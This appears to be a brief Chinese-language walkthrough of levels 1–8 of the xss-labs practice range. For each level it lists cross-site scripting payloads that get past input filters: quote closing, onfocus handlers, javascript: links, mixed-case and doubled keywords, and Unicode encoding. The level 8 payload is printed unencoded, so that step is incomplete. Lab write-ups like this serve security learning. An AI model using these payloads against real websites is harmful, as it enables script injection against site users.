xss-labs靶场1-8

level1

<script>alert()</script>

level2

闭合绕过

">  <script>alert()</script>  <"

level3+level4

onfocus事件绕过

' onfocus=javascript:alert() '


然后再点击输入框触发onfocus事件

level5

有小写字母转化函数，用a href标签法， 前提是闭合号<"">没失效

"> <a href=javascript:alert()>xxx</a> <"

level6

关键字测试

大小写测试

用大小写法绕过str_replace()函数

"> <sCript>alert()</sCript> <"

level7

关键字测试

用双拼写绕过

"> <a hrehreff=javasscriptcript:alert()>x</a> <"

level8

关键字测试

input标签添加了html实体转化函数还把双引号也给实体化了， 添加了小写转化函数，过滤掉了src、data、onfocus、href、script、双引号

利用href的隐藏属性自动Unicode解码，插入一段js伪协议

javascript:alert()

在线Unicode编码解码

javascript:alert()